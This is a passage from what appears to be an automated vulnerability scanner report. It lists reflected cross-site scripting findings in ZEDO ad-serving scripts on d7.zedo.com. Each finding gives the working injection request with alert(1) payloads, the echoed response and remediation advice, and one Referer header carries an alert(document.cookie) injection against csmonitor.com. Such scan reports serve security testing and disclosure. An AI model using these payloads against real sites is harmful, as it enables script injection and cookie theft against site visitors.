var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.15. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd682'%3balert(1)//8194c718852 was submitted in the q parameter. This input was echoed as fd682';alert(1)//8194c718852 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=fd682'%3balert(1)//8194c718852&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=526
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:00 GMT
Connection: close
Content-Length: 1987

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='fd682';alert(1)//8194c718852';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=fd682';alert(1)//8194c718852;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.16. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae34c"%3balert(1)//b23cf797565 was submitted in the q parameter. This input was echoed as ae34c";alert(1)//b23cf797565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=ae34c"%3balert(1)//b23cf797565&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1479B1099,2#702971|0,1,1;expires=Fri, 18 Feb 2011 18:00:59 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=527
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:00:59 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='ae34c";alert(1)//b23cf797565';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=ae34c";alert(1)//b23cf797565;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=
...[SNIP]...

4.17. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35817"%3balert(1)//c76b7e8cf54 was submitted in the $ parameter. This input was echoed as 35817";alert(1)//c76b7e8cf54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=35817"%3balert(1)//c76b7e8cf54&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:35817";alert(1)//c76b7e8cf54;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=534
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:00:52 GMT
Connection: close
Content-Length: 2038

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',35817";alert(1)//c76b7e8cf54';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,35817";alert(1)//c76b7e8cf54;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=
...[SNIP]...

4.18. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7468b'%3balert(1)//803ecb61dff was submitted in the $ parameter. This input was echoed as 7468b';alert(1)//803ecb61dff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=7468b'%3balert(1)//803ecb61dff&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:7468b';alert(1)//803ecb61dff;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:53 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=533
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:00:53 GMT
Connection: close
Content-Length: 2038

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',7468b';alert(1)//803ecb61dff';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,7468b';alert(1)//803ecb61dff;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.19. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb90e'-alert(1)-'40d04a4f8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?fb90e'-alert(1)-'40d04a4f8f9=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 942
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=249
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:50 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fmr.js;qs=fb90e'-alert(1)-'40d04a4f8f9=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.20. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69e4b"%3balert(1)//9f07af1dcbc was submitted in the q parameter. This input was echoed as 69e4b";alert(1)//9f07af1dcbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=69e4b"%3balert(1)//9f07af1dcbc&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:49 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Wed, 19 Jan 2011 18:01:37 GMT
Date: Wed, 19 Jan 2011 18:00:49 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='69e4b";alert(1)//9f07af1dcbc';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=69e4b";alert(1)//9f07af1dcbc;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=
...[SNIP]...

4.21. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59624'%3balert(1)//65aac50a934 was submitted in the q parameter. This input was echoed as 59624';alert(1)//65aac50a934 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=59624'%3balert(1)//65aac50a934&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:50 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=47
Expires: Wed, 19 Jan 2011 18:01:37 GMT
Date: Wed, 19 Jan 2011 18:00:50 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='59624';alert(1)//65aac50a934';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=59624';alert(1)//65aac50a934;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.22. http://dcregistry.com/cgi-bin/classifieds/classifieds.cgi [db parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/classifieds/classifieds.cgi

Issue detail

